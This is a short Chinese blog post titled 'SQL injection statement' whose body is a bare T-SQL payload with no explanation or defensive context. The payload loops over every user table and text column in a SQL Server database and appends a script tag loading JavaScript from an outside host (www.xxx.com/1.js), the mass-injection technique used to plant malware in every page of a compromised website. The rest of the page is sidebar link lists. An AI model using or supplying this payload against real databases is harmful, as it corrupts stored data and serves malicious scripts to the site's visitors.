sql注入语句

精贴 置顶
2209 0

declare @t varchar(255),@c varchar(255)
declare table_cursor cursor for select a.name,b.name
from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u'
 and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
open table_cursor fetch next from table_cursor into @t,@c
while(@@fetch_status=0) begin
exec('update ['+@t+'] set ['+@c+']=rtrim(convert(varchar,['+@c+']))
+''</title><script src=http://www.xxx.com/1.js></script>''')
fetch next from table_cursor into @t,@c end close table_cursor
deallocate table_cursor

  • 没有任何评论
今日天气 ···

···

···

···

热门排行
CSS cursor鼠标样式一览表 2012-06-25
.NET后台写JS代码 2011-11-03
网站地址多出jdfwkey的问题解析及... 2010-08-25
数据库xxx的日志已满,请备份该数... 2013-07-19
百度、google、Yahoo网站地图制作... 2011-01-30
<a>标签的伪类书写顺序问题... 2010-09-04
什么是长尾关键词? 2010-09-24
CEO名言 2010-08-31
Mysql 主从数据库同步 2010-09-12
用ASP实现网页BBS 2010-11-01
博主推荐
本个人博客微信公众平台上线啦~~... 2013-10-13
饼哥网络互联上线啦~~要买域名空... 2013-09-20
网站title标题如何正确修改不会被... 2013-08-26
饼哥通讯录系统上线啦,欢迎大家... 2013-08-24
ASP .NET MYSQL 的简单分页 并不... 2013-08-19
网站有弹窗广告这样的站点,百度... 2013-08-17
做淘宝SEO优化需要注意的8大问题 2013-08-17
淘宝网怎么做SEO优化 2013-08-17
站长们要学习的“苍井空精神” 2013-08-17
苹果公司今日发布了iOS 7第五个开... 2013-08-07
随便看看
什么是搜索引擎优化SEO? 2010-09-23
PS快捷键大全 2010-09-08
ASP基础教程:堵住ASP漏洞 2010-10-22
.NET弹出对话框以及页面跳转总结 2011-11-03
ToString Convert.ToString和(s... 2010-11-22
ASP.NET 2.0防止同一用户同时登陆... 2010-09-10
浅析asp.net验证控件失效原因及解... 2013-07-19
IBM JDK一个诡异问题:java类名无... 2013-06-26
子域名和子目录 2010-10-03
你会接受扁平化设计吗? 2013-08-17
RSS新闻
传媒新闻
CSDN
八卦新闻
女性新闻
台湾新闻
互联网
军事-新浪博客
IT-新浪博客
汽车新闻
游戏新闻
国际新闻
国内新闻
体育新闻
我的微博
北京 上海 杭州 深圳 广州 成都